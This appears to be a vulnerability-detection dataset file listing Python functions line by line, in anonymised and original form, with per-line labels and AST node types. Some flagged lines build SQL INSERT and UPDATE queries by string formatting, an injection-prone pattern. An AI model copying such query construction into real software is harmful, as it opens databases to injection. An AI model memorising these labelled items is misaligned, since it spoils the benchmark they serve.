lines:
  sequencelengths:
  - 1
  - 444
raw_lines:
  sequencelengths:
  - 1
  - 444
label:
  sequencelengths:
  - 1
  - 444
type:
  sequencelengths:
  - 1
  - 444
[ "def FUNC_0(self):...\n", "VAR_16 = self.config.get_connection_interfaces()\n", "for source in VAR_16:\n", "if source['type'] == 'inverter':\n", "VAR_20 = 'string' % (source['serial_id'], 0, source['prev_etotal'])\n", "self.c.execute(VAR_20)\n", "VAR_20 = 'string' % (source['name'], source['inverter_type'],\n 's0-bridge v0', 'OK', int(datetime.now().timestamp()), source['serial_id'])\n", "self.c.execute(VAR_20)\n", "self.db.commit()\n" ]
[ "def add_inverters(self):...\n", "interfaces = self.config.get_connection_interfaces()\n", "for source in interfaces:\n", "if source['type'] == 'inverter':\n", "query = (\n \"\"\"\n INSERT OR IGNORE INTO Inverters (\n Serial,\n EToday,\n ETotal\n ) VALUES (\n %s,\n %s,\n %s\n );\n \"\"\"\n % (source['serial_id'], 0, source['prev_etotal']))\n", "self.c.execute(query)\n", "query = (\n \"\"\"\n UPDATE Inverters\n SET \n Name='%s', \n Type='%s', \n SW_Version='%s', \n Status='%s',\n TimeStamp='%s'\n WHERE Serial='%s';\n \"\"\"\n % (source['name'], source['inverter_type'], 's0-bridge v0', 'OK', int(\n datetime.now().timestamp()), source['serial_id']))\n", "self.c.execute(query)\n", "self.db.commit()\n" ]
[ 0, 0, 0, 0, 4, 4, 4, 0, 0 ]
[ "FunctionDef'", "Assign'", "For", "Condition", "Assign'", "Expr'", "Assign'", "Expr'", "Expr'" ]
[ "def FUNC_2(VAR_4):...\n", "VAR_5 = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "VAR_6 = re.findall(VAR_5, VAR_2.written[0])\n", "self.assertEquals(len(VAR_6), 1)\n" ]
[ "def assert_response(_):...\n", "expected = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "matches = re.findall(expected, request.written[0])\n", "self.assertEquals(len(matches), 1)\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Expr'" ]
[ "def FUNC_4(self, VAR_5='/'):...\n", "VAR_6 = os.path.join(self.namespace, VAR_5)\n", "if VAR_6 != '/':\n", "VAR_6 = VAR_6.rstrip('/')\n", "VAR_7 = self.etcd.read(VAR_6, recursive=True)\n", "return None\n", "VAR_3 = FUNC_2()\n", "for entry in VAR_7.get_subtree():\n", "if entry.key == VAR_6:\n", "return sorted(VAR_3)\n", "VAR_8 = entry.key[len(VAR_6):]\n", "if entry.dir and not VAR_8.endswith('/'):\n", "VAR_8 += '/'\n", "VAR_3.add(VAR_8.lstrip('/'))\n" ]
[ "def list(self, keyfilter='/'):...\n", "path = os.path.join(self.namespace, keyfilter)\n", "if path != '/':\n", "path = path.rstrip('/')\n", "result = self.etcd.read(path, recursive=True)\n", "return None\n", "value = set()\n", "for entry in result.get_subtree():\n", "if entry.key == path:\n", "return sorted(value)\n", "name = entry.key[len(path):]\n", "if entry.dir and not name.endswith('/'):\n", "name += '/'\n", "value.add(name.lstrip('/'))\n" ]
[ 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Assign'", "Assign'", "Return'", "Assign'", "For", "Condition", "Return'", "Assign'", "Condition", "AugAssign'", "Expr'" ]
[ "def FUNC_19(VAR_11, VAR_1, VAR_20, VAR_3, VAR_19):...\n", "" ]
[ "def handleStorageOps(item, stack, storage, symbols, userIn):...\n", "" ]
[ 0, 0 ]
[ "FunctionDef'", "Condition" ]
[ "def __init__(self):...\n", "self.__connection = mysql.connect(**conf.DATABASE)\n", "self.cursor = self.__connection.cursor()\n" ]
[ "def __init__(self):...\n", "self.__connection = mysql.connect(**conf.DATABASE)\n", "self.cursor = self.__connection.cursor()\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'" ]
[ "def FUNC_13(self):...\n", "if self.accept(CLASS_1.REDIRECT_OUT):\n", "VAR_44 = self.expect(CLASS_1.WORD).lexeme\n", "if self.accept(CLASS_1.REDIRECT_APPEND):\n", "return CLASS_10(1, (VAR_44, os.O_CREAT | os.O_WRONLY | os.O_TRUNC))\n", "VAR_44 = self.expect(CLASS_1.WORD).lexeme\n", "if self.accept(CLASS_1.REDIRECT_IN):\n", "return CLASS_10(1, (VAR_44, os.O_CREAT | os.O_WRONLY | os.O_APPEND))\n", "VAR_44 = self.expect(CLASS_1.WORD).lexeme\n", "return None\n", "return CLASS_10(0, (VAR_44, os.O_RDONLY))\n" ]
[ "def redirection(self):...\n", "if self.accept(TokenType.REDIRECT_OUT):\n", "filename = self.expect(TokenType.WORD).lexeme\n", "if self.accept(TokenType.REDIRECT_APPEND):\n", "return RedirectionHelper(1, (filename, os.O_CREAT | os.O_WRONLY | os.O_TRUNC))\n", "filename = self.expect(TokenType.WORD).lexeme\n", "if self.accept(TokenType.REDIRECT_IN):\n", "return RedirectionHelper(1, (filename, os.O_CREAT | os.O_WRONLY | os.O_APPEND))\n", "filename = self.expect(TokenType.WORD).lexeme\n", "return None\n", "return RedirectionHelper(0, (filename, os.O_RDONLY))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Assign'", "Condition", "Return'", "Assign'", "Condition", "Return'", "Assign'", "Return'", "Return'" ]
[ "def FUNC_7(self):...\n", "return self.data\n" ]
[ "def to_json(self):...\n", "return self.data\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_36(self, VAR_20):...\n", "return ''.join(FUNC_8(VAR_20)) == '*'\n" ]
[ "def is_dummy_password(self, pwd):...\n", "return ''.join(set(pwd)) == '*'\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_16(self):...\n", "VAR_43 = log_check_output(['svn', 'st', '--xml', self.directory],\n universal_newlines=True)\n", "VAR_44 = ElementTree.fromstring(VAR_43)\n", "for entry in VAR_44.findall(\n", "return True\n", "return False\n" ]
[ "def has_local_edit(self):...\n", "xml = log_check_output(['svn', 'st', '--xml', self.directory],\n universal_newlines=True)\n", "doc = ElementTree.fromstring(xml)\n", "for entry in doc.findall(\n", "return True\n", "return False\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "For", "Return'", "Return'" ]
[ "def FUNC_0(VAR_2, VAR_3=None, VAR_4=None, VAR_5=None):...\n", "VAR_8 = None\n", "if VAR_3 is not None:\n", "VAR_8 = get_object_or_404(VAR_5, **{group_slug_field: group_slug})\n", "return VAR_2, VAR_8\n", "VAR_2 = VAR_2.filter(content_type=get_ct(group), object_id=group.id)\n" ]
[ "def get_articles_by_group(article_qs, group_slug=None, group_slug_field=...\n", "group = None\n", "if group_slug is not None:\n", "group = get_object_or_404(group_qs, **{group_slug_field: group_slug})\n", "return article_qs, group\n", "article_qs = article_qs.filter(content_type=get_ct(group), object_id=group.id)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Assign'", "Return'", "Assign'" ]
[ "@classmethod...\n", "if VAR_6 == 'custom':\n", "return VAR_7\n", "return '{}_{}'.format(VAR_7, VAR_6.replace('.', '_'))\n" ]
[ "@classmethod...\n", "if version == 'custom':\n", "return tool\n", "return '{}_{}'.format(tool, version.replace('.', '_'))\n" ]
[ 7, 0, 0, 0 ]
[ "Condition", "Condition", "Return'", "Return'" ]
[ "def FUNC_22(self, VAR_3):...\n", "if self.allowed_email_whitelist is not None:\n", "return VAR_3 in self.allowed_email_whitelist\n", "return True\n" ]
[ "def passes_email_whitelist(self, email):...\n", "if self.allowed_email_whitelist is not None:\n", "return email in self.allowed_email_whitelist\n", "return True\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Return'", "Return'" ]
[ "def FUNC_6(self):...\n", "return True\n" ]
[ "def Done(self):...\n", "return True\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_13(self, VAR_16):...\n", "return VAR_6 in VAR_16.bookmarks\n" ]
[ "def does_intersect_rule(self, rulectx):...\n", "return bookmark in rulectx.bookmarks\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_6(self):...\n", "VAR_14 = self.client.get('/get_data/')\n", "self.assertEqual(VAR_14.status_code, 200)\n", "self.assertContains(VAR_14, 'Download PUCs')\n" ]
[ "def test_download_pucs_button(self):...\n", "response = self.client.get('/get_data/')\n", "self.assertEqual(response.status_code, 200)\n", "self.assertContains(response, 'Download PUCs')\n" ]
[ 0, 6, 6, 0 ]
[ "FunctionDef'", "Assign'", "Expr'", "Expr'" ]
[ "def FUNC_1(self) ->MessageDTO:...\n", "\"\"\"docstring\"\"\"\n", "VAR_20 = MessageDTO()\n", "VAR_20.message_id = self.id\n", "VAR_20.message = self.message\n", "VAR_20.sent_date = self.date\n", "VAR_20.read = self.read\n", "VAR_20.subject = self.subject\n", "VAR_20.project_id = self.project_id\n", "VAR_20.task_id = self.task_id\n", "if self.message_type is not None:\n", "VAR_20.message_type = CLASS_0(self.message_type).name\n", "if self.from_user_id:\n", "VAR_20.from_username = self.from_user.username\n", "return VAR_20\n" ]
[ "def as_dto(self) ->MessageDTO:...\n", "\"\"\"docstring\"\"\"\n", "dto = MessageDTO()\n", "dto.message_id = self.id\n", "dto.message = self.message\n", "dto.sent_date = self.date\n", "dto.read = self.read\n", "dto.subject = self.subject\n", "dto.project_id = self.project_id\n", "dto.task_id = self.task_id\n", "if self.message_type is not None:\n", "dto.message_type = MessageType(self.message_type).name\n", "if self.from_user_id:\n", "dto.from_username = self.from_user.username\n", "return dto\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Assign'", "Return'" ]
[ "def FUNC_25(VAR_20):...\n", "def FUNC_26(VAR_30, *VAR_12, **VAR_17):...\n", "if not GLSetting.memory_copy.anomaly_checks:\n", "return VAR_20(VAR_30, *VAR_12, **kw)\n", "if GLSetting.anomalies_counter[VAR_1] > alarm_level[VAR_1]:\n", "if VAR_1 == 'new_submission':\n", "return VAR_20(VAR_30, *VAR_12, **kw)\n", "log.debug('Blocked a New Submission (%d > %d)' % (GLSetting.\n anomalies_counter[VAR_1], alarm_level[VAR_1]))\n", "if VAR_1 == 'finalized_submission':\n", "log.debug('Blocked a Finalized Submission (%d > %d)' % (GLSetting.\n anomalies_counter[VAR_1], alarm_level[VAR_1]))\n", "if VAR_1 == 'anon_requests':\n", "log.debug('Blocked an Anon Request (%d > %d)' % (GLSetting.\n anomalies_counter[VAR_1], alarm_level[VAR_1]))\n", "if VAR_1 == 'file_uploaded':\n", "log.debug('Blocked a File upload (%d > %d)' % (GLSetting.anomalies_counter[\n VAR_1], alarm_level[VAR_1]))\n", "log.debug('Blocked an Unknown event (=%s) !? [BUG!] (%d > %d)' % (VAR_1,\n GLSetting.anomalies_counter[VAR_1], alarm_level[VAR_1]))\n" ]
[ "def wrapper(method_handler):...\n", "def call_handler(cls, *args, **kw):...\n", "if not GLSetting.memory_copy.anomaly_checks:\n", "return method_handler(cls, *args, **kw)\n", "if GLSetting.anomalies_counter[element] > alarm_level[element]:\n", "if element == 'new_submission':\n", "return method_handler(cls, *args, **kw)\n", "log.debug('Blocked a New Submission (%d > %d)' % (GLSetting.\n anomalies_counter[element], alarm_level[element]))\n", "if element == 'finalized_submission':\n", "log.debug('Blocked a Finalized Submission (%d > %d)' % (GLSetting.\n anomalies_counter[element], alarm_level[element]))\n", "if element == 'anon_requests':\n", "log.debug('Blocked an Anon Request (%d > %d)' % (GLSetting.\n anomalies_counter[element], alarm_level[element]))\n", "if element == 'file_uploaded':\n", "log.debug('Blocked a File upload (%d > %d)' % (GLSetting.anomalies_counter[\n element], alarm_level[element]))\n", "log.debug('Blocked an Unknown event (=%s) !? [BUG!] (%d > %d)' % (element,\n GLSetting.anomalies_counter[element], alarm_level[element]))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "FunctionDef'", "Condition", "Return'", "Condition", "Condition", "Return'", "Expr'", "Condition", "Expr'", "Condition", "Expr'", "Condition", "Expr'", "Expr'" ]
[ "def FUNC_6(self, VAR_7):...\n", "VAR_8 = self.content\n", "while VAR_8:\n", "yield VAR_8[:VAR_7]\n", "VAR_8 = VAR_8[VAR_7:]\n" ]
[ "def iter_content(self, chunk_size):...\n", "c = self.content\n", "while c:\n", "yield c[:chunk_size]\n", "c = c[chunk_size:]\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Expr'", "Assign'" ]
[ "def FUNC_9(self):...\n", "for resource in set(resource for VAR_13 in self.rules for resource in\n", "if resource not in '_cores _nodes'.split():\n", "logger.info(resource)\n" ]
[ "def list_resources(self):...\n", "for resource in set(resource for rule in self.rules for resource in rule.\n", "if resource not in '_cores _nodes'.split():\n", "logger.info(resource)\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "For", "Condition", "Expr'" ]
[ "def FUNC_1(self, VAR_1, VAR_2, VAR_5, VAR_6, VAR_4={}):...\n", "\"\"\"docstring\"\"\"\n", "VAR_22 = self.pool.get('stock.location')\n", "VAR_23 = self.pool.get('account.move')\n", "VAR_24 = self.pool.get('account.move.line')\n", "VAR_25 = VAR_6.get('new_price', 0.0)\n", "VAR_19 = VAR_6.get('stock_output_account', False)\n", "VAR_18 = VAR_6.get('stock_input_account', False)\n", "VAR_20 = VAR_6.get('stock_journal', False)\n", "VAR_17 = self.browse(VAR_1, VAR_2, VAR_5)[0]\n", "VAR_21 = VAR_17.categ_id.property_stock_variation\n", "VAR_26 = VAR_21 and VAR_21.id or False\n", "if not VAR_26:\n", "VAR_27 = []\n", "VAR_28 = VAR_22.search(VAR_1, VAR_2, [('usage', '=', 'internal')])\n", "for rec_id in VAR_5:\n", "for location in VAR_22.browse(VAR_1, VAR_2, VAR_28):\n", "return VAR_27\n", "VAR_49 = VAR_4.copy()\n", "self.write(VAR_1, VAR_2, rec_id, {'standard_price': VAR_25})\n", "VAR_49.update({'location': location.id, 'compute_child': False})\n", "VAR_45 = self.browse(VAR_1, VAR_2, rec_id, VAR_4=c)\n", "VAR_53 = VAR_45.qty_available\n", "VAR_54 = VAR_45.standard_price - VAR_25\n", "if not VAR_54:\n", "if VAR_53:\n", "VAR_56 = location.company_id and location.company_id.id or False\n", "if not VAR_56:\n", "if not VAR_20:\n", "VAR_20 = (VAR_45.categ_id.property_stock_journal and VAR_45.categ_id.\n property_stock_journal.id or False)\n", "if not VAR_20:\n", "VAR_57 = VAR_23.create(VAR_1, VAR_2, {'journal_id': VAR_20, 'company_id':\n VAR_56})\n", "VAR_27.append(VAR_57)\n", "if VAR_54 > 0:\n", "if not VAR_18:\n", "if VAR_54 < 0:\n", "VAR_18 = VAR_45.product_tmpl_id.property_stock_account_input.id\n", "if not VAR_18:\n", "if not VAR_19:\n", "VAR_18 = VAR_45.categ_id.property_stock_account_input_categ.id\n", "if not VAR_18:\n", "VAR_19 = VAR_45.product_tmpl_id.property_stock_account_output.id\n", "if not VAR_19:\n", "VAR_58 = VAR_53 * VAR_54\n", "VAR_19 = VAR_45.categ_id.property_stock_account_output_categ.id\n", "if not VAR_19:\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.name, 'account_id': VAR_18,\n 'debit': VAR_58, 'move_id': VAR_57})\n", "VAR_58 = VAR_53 * -VAR_54\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.categ_id.name, 'account_id':\n VAR_26, 'credit': VAR_58, 'move_id': VAR_57})\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.name, 'account_id': VAR_19,\n 'credit': VAR_58, 'move_id': VAR_57})\n", "VAR_24.create(VAR_1, VAR_2, {'name': VAR_45.categ_id.name, 'account_id':\n VAR_26, 'debit': VAR_58, 'move_id': VAR_57})\n" ]
[ "def do_change_standard_price(self, cr, uid, ids, datas, context={}):...\n", "\"\"\"docstring\"\"\"\n", "location_obj = self.pool.get('stock.location')\n", "move_obj = self.pool.get('account.move')\n", "move_line_obj = self.pool.get('account.move.line')\n", "new_price = datas.get('new_price', 0.0)\n", "stock_output_acc = datas.get('stock_output_account', False)\n", "stock_input_acc = datas.get('stock_input_account', False)\n", "journal_id = datas.get('stock_journal', False)\n", "product_obj = self.browse(cr, uid, ids)[0]\n", "account_variation = product_obj.categ_id.property_stock_variation\n", "account_variation_id = account_variation and account_variation.id or False\n", "if not account_variation_id:\n", "move_ids = []\n", "loc_ids = location_obj.search(cr, uid, [('usage', '=', 'internal')])\n", "for rec_id in ids:\n", "for location in location_obj.browse(cr, uid, loc_ids):\n", "return move_ids\n", "c = context.copy()\n", "self.write(cr, uid, rec_id, {'standard_price': new_price})\n", "c.update({'location': location.id, 'compute_child': False})\n", "product = self.browse(cr, uid, rec_id, context=c)\n", "qty = product.qty_available\n", "diff = product.standard_price - new_price\n", "if not diff:\n", "if qty:\n", "company_id = location.company_id and location.company_id.id or False\n", "if not company_id:\n", "if not journal_id:\n", "journal_id = (product.categ_id.property_stock_journal and product.categ_id.\n property_stock_journal.id or False)\n", "if not journal_id:\n", "move_id = move_obj.create(cr, uid, {'journal_id': journal_id, 'company_id':\n company_id})\n", "move_ids.append(move_id)\n", "if diff > 0:\n", "if not stock_input_acc:\n", "if diff < 0:\n", "stock_input_acc = product.product_tmpl_id.property_stock_account_input.id\n", "if not stock_input_acc:\n", "if not stock_output_acc:\n", "stock_input_acc = product.categ_id.property_stock_account_input_categ.id\n", "if not stock_input_acc:\n", "stock_output_acc = product.product_tmpl_id.property_stock_account_output.id\n", "if not stock_output_acc:\n", "amount_diff = qty * diff\n", "stock_output_acc = product.categ_id.property_stock_account_output_categ.id\n", "if not stock_output_acc:\n", "move_line_obj.create(cr, uid, {'name': product.name, 'account_id':\n stock_input_acc, 'debit': amount_diff, 'move_id': move_id})\n", "amount_diff = qty * -diff\n", "move_line_obj.create(cr, uid, {'name': product.categ_id.name, 'account_id':\n account_variation_id, 'credit': amount_diff, 'move_id': move_id})\n", "move_line_obj.create(cr, uid, {'name': product.name, 'account_id':\n stock_output_acc, 'credit': amount_diff, 'move_id': move_id})\n", "move_line_obj.create(cr, uid, {'name': product.categ_id.name, 'account_id':\n account_variation_id, 'debit': amount_diff, 'move_id': move_id})\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "For", "For", "Return'", "Assign'", "Expr'", "Expr'", "Assign'", "Assign'", "Assign'", "Condition", "Condition", "Assign'", "Condition", "Condition", "Assign'", "Condition", "Assign'", "Expr'", "Condition", "Condition", "Condition", "Assign'", "Condition", "Condition", "Assign'", "Condition", "Assign'", "Condition", "Assign'", "Assign'", "Condition", "Expr'", "Assign'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_0(VAR_4, VAR_5=None, VAR_6=None):...\n", "\"\"\"docstring\"\"\"\n", "if VAR_6 is None:\n", "VAR_6 = ray.worker.global_worker\n", "return CLASS_2(VAR_6.profiler, VAR_4, VAR_5=extra_data)\n" ]
[ "def profile(event_type, extra_data=None, worker=None):...\n", "\"\"\"docstring\"\"\"\n", "if worker is None:\n", "worker = ray.worker.global_worker\n", "return RayLogSpanRaylet(worker.profiler, event_type, extra_data=extra_data)\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Condition", "Assign'", "Return'" ]
[ "def FUNC_15(self, VAR_3=None):...\n", "\"\"\"docstring\"\"\"\n", "def FUNC_22(VAR_30, VAR_3):...\n", "if not isinstance(VAR_30, _IOFile):\n", "return IOFile(VAR_30, VAR_16=self)\n", "return VAR_30.apply_wildcards(VAR_3, fill_missing=f in self.dynamic_input,\n fail_dynamic=self.dynamic_output)\n" ]
[ "def expand_wildcards(self, wildcards=None):...\n", "\"\"\"docstring\"\"\"\n", "def concretize_iofile(f, wildcards):...\n", "if not isinstance(f, _IOFile):\n", "return IOFile(f, rule=self)\n", "return f.apply_wildcards(wildcards, fill_missing=f in self.dynamic_input,\n fail_dynamic=self.dynamic_output)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "FunctionDef'", "Condition", "Return'", "Return'" ]
[ "def FUNC_7(self):...\n", "\"\"\"docstring\"\"\"\n", "VAR_1 = self.bindings\n", "VAR_11 = '{app}-{stack}-v000'.format(app=self.TEST_APP, stack=bindings[\n 'TEST_STACK'])\n", "VAR_9 = self.agent.make_json_payload_from_kwargs(job=[{'cloudProvider':\n 'gce', 'application': self.TEST_APP, 'credentials': bindings[\n 'GCE_CREDENTIALS'], 'strategy': '', 'capacity': {'min': 2, 'max': 2,\n 'desired': 2}, 'targetSize': 2, 'image': bindings['TEST_GCE_IMAGE_NAME'\n ], 'zone': bindings['TEST_GCE_ZONE'], 'stack': bindings['TEST_STACK'],\n 'instanceType': 'f1-micro', 'type': 'createServerGroup',\n 'loadBalancers': [bindings['TEST_APP_COMPONENT_NAME']],\n 'availabilityZones': {bindings['TEST_GCE_REGION']: [bindings[\n 'TEST_GCE_ZONE']]}, 'instanceMetadata': {'startup-script':\n 'sudo apt-get update && sudo apt-get install apache2 -y',\n 'load-balancer-names': bindings['TEST_APP_COMPONENT_NAME']}, 'account':\n bindings['GCE_CREDENTIALS'], 'authScopes': ['compute'], 'user':\n '[anonymous]'}], description='Create Server Group in ' + group_name,\n application=self.TEST_APP)\n", "VAR_10 = gcp.GceContractBuilder(self.gce_observer)\n", "VAR_10.new_clause_builder('Managed Instance Group Added', retryable_for_secs=30\n ).inspect_resource('managed-instance-groups', VAR_11).contains_path_eq(\n 'targetSize', 2)\n", "return st.OperationContract(self.new_post_operation(title=\n 'create_server_group', data=payload, path='tasks'), VAR_5=builder.build())\n" ]
[ "def create_server_group(self):...\n", "\"\"\"docstring\"\"\"\n", "bindings = self.bindings\n", "group_name = '{app}-{stack}-v000'.format(app=self.TEST_APP, stack=bindings[\n 'TEST_STACK'])\n", "payload = self.agent.make_json_payload_from_kwargs(job=[{'cloudProvider':\n 'gce', 'application': self.TEST_APP, 'credentials': bindings[\n 'GCE_CREDENTIALS'], 'strategy': '', 'capacity': {'min': 2, 'max': 2,\n 'desired': 2}, 'targetSize': 2, 'image': bindings['TEST_GCE_IMAGE_NAME'\n ], 'zone': bindings['TEST_GCE_ZONE'], 'stack': bindings['TEST_STACK'],\n 'instanceType': 'f1-micro', 'type': 'createServerGroup',\n 'loadBalancers': [bindings['TEST_APP_COMPONENT_NAME']],\n 'availabilityZones': {bindings['TEST_GCE_REGION']: [bindings[\n 'TEST_GCE_ZONE']]}, 'instanceMetadata': {'startup-script':\n 'sudo apt-get update && sudo apt-get install apache2 -y',\n 'load-balancer-names': bindings['TEST_APP_COMPONENT_NAME']}, 'account':\n bindings['GCE_CREDENTIALS'], 'authScopes': ['compute'], 'user':\n '[anonymous]'}], description='Create Server Group in ' + group_name,\n application=self.TEST_APP)\n", "builder = gcp.GceContractBuilder(self.gce_observer)\n", "builder.new_clause_builder('Managed Instance Group Added',\n retryable_for_secs=30).inspect_resource('managed-instance-groups',\n group_name).contains_path_eq('targetSize', 2)\n", "return st.OperationContract(self.new_post_operation(title=\n 'create_server_group', data=payload, path='tasks'), contract=builder.\n build())\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Return'" ]
[ "def FUNC_6(self):...\n", "self.login()\n", "while True:\n", "VAR_30 = random.choice(self.tasks)\n", "self.do_step(SubmitRandomRequest(self.browser, VAR_30, VAR_10=self.base_url,\n VAR_11=self.submissions_path))\n" ]
[ "def act(self):...\n", "self.login()\n", "while True:\n", "task = random.choice(self.tasks)\n", "self.do_step(SubmitRandomRequest(self.browser, task, base_url=self.base_url,\n submissions_path=self.submissions_path))\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Condition", "Assign'", "Expr'" ]
[ "def __call__(self, VAR_11):...\n", "VAR_15 = []\n", "if self.param:\n", "for p in utils.tup(self.param):\n", "return self.run(*VAR_15)\n", "if self.post and VAR_102.post.get(p):\n", "VAR_33 = VAR_102.post[p]\n", "if self.get and VAR_102.get.get(p):\n", "VAR_15.append(VAR_33)\n", "VAR_33 = VAR_102.get[p]\n", "if self.url and VAR_11.get(p):\n", "VAR_33 = VAR_11[p]\n", "VAR_33 = self.default\n" ]
[ "def __call__(self, url):...\n", "a = []\n", "if self.param:\n", "for p in utils.tup(self.param):\n", "return self.run(*a)\n", "if self.post and request.post.get(p):\n", "val = request.post[p]\n", "if self.get and request.get.get(p):\n", "a.append(val)\n", "val = request.get[p]\n", "if self.url and url.get(p):\n", "val = url[p]\n", "val = self.default\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "For", "Return'", "Condition", "Assign'", "Condition", "Expr'", "Assign'", "Condition", "Assign'", "Assign'" ]
[ "def __init__(self, VAR_1, VAR_2, VAR_3, VAR_4=None):...\n", "self.state = ray.experimental.state.GlobalState()\n", "self.state._initialize_global_state(VAR_1, VAR_2, VAR_4=redis_password)\n", "self.redis = VAR_42.StrictRedis(host=redis_address, port=redis_port, db=0,\n password=redis_password)\n", "self.primary_subscribe_client = self.redis.pubsub(ignore_subscribe_messages\n =True)\n", "self.local_scheduler_id_to_ip_map = {}\n", "self.load_metrics = LoadMetrics()\n", "if VAR_3:\n", "self.autoscaler = StandardAutoscaler(VAR_3, self.load_metrics)\n", "self.autoscaler = None\n", "self.issue_gcs_flushes = 'RAY_USE_NEW_GCS' in os.environ\n", "self.gcs_flush_policy = None\n", "if self.issue_gcs_flushes:\n", "VAR_31 = self.redis.lrange('RedisShards', 0, -1)\n", "if len(VAR_31) > 1:\n", "VAR_0.warning(\n 'Monitor: TODO: if launching > 1 redis shard, flushing needs to touch shards in parallel.'\n )\n", "VAR_31 = VAR_31[0].split(b':')\n", "self.issue_gcs_flushes = False\n", "self.redis_shard = VAR_42.StrictRedis(host=addr_port[0], port=addr_port[1],\n password=redis_password)\n", "self.redis_shard.execute_command('HEAD.FLUSH 0')\n", "VAR_0.info('Monitor: Turning off flushing due to exception: {}'.format(str(e)))\n", "self.issue_gcs_flushes = False\n" ]
[ "def __init__(self, redis_address, redis_port, autoscaling_config,...\n", "self.state = ray.experimental.state.GlobalState()\n", "self.state._initialize_global_state(redis_address, redis_port,\n redis_password=redis_password)\n", "self.redis = redis.StrictRedis(host=redis_address, port=redis_port, db=0,\n password=redis_password)\n", "self.primary_subscribe_client = self.redis.pubsub(ignore_subscribe_messages\n =True)\n", "self.local_scheduler_id_to_ip_map = {}\n", "self.load_metrics = LoadMetrics()\n", "if autoscaling_config:\n", "self.autoscaler = StandardAutoscaler(autoscaling_config, self.load_metrics)\n", "self.autoscaler = None\n", "self.issue_gcs_flushes = 'RAY_USE_NEW_GCS' in os.environ\n", "self.gcs_flush_policy = None\n", "if self.issue_gcs_flushes:\n", "addr_port = self.redis.lrange('RedisShards', 0, -1)\n", "if len(addr_port) > 1:\n", "logger.warning(\n 'Monitor: TODO: if launching > 1 redis shard, flushing needs to touch shards in parallel.'\n )\n", "addr_port = addr_port[0].split(b':')\n", "self.issue_gcs_flushes = False\n", "self.redis_shard = redis.StrictRedis(host=addr_port[0], port=addr_port[1],\n password=redis_password)\n", "self.redis_shard.execute_command('HEAD.FLUSH 0')\n", "logger.info('Monitor: Turning off flushing due to exception: {}'.format(str(e))\n )\n", "self.issue_gcs_flushes = False\n" ]
[ 0, 0, 6, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Expr'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Expr'", "Assign'", "Assign'", "Assign'", "Expr'", "Expr'", "Assign'" ]
[ "def FUNC_3(VAR_1):...\n", "VAR_7 = 0\n", "VAR_8 = 0\n", "for VAR_2 in VAR_1:\n", "if VAR_2.try_job_url:\n", "return VAR_7, VAR_8\n", "VAR_8 += 1\n", "VAR_7 += 1\n" ]
[ "def _GetNumbersOfDataPointGroups(data_points):...\n", "build_level_number = 0\n", "revision_level_number = 0\n", "for data_point in data_points:\n", "if data_point.try_job_url:\n", "return build_level_number, revision_level_number\n", "revision_level_number += 1\n", "build_level_number += 1\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "For", "Condition", "Return'", "AugAssign'", "AugAssign'" ]
[ "def FUNC_7(self):...\n", "return self.render_string('modules/bootstrap_include.html')\n" ]
[ "def render(self):...\n", "return self.render_string('modules/bootstrap_include.html')\n" ]
[ 0, 6 ]
[ "FunctionDef'", "Return'" ]
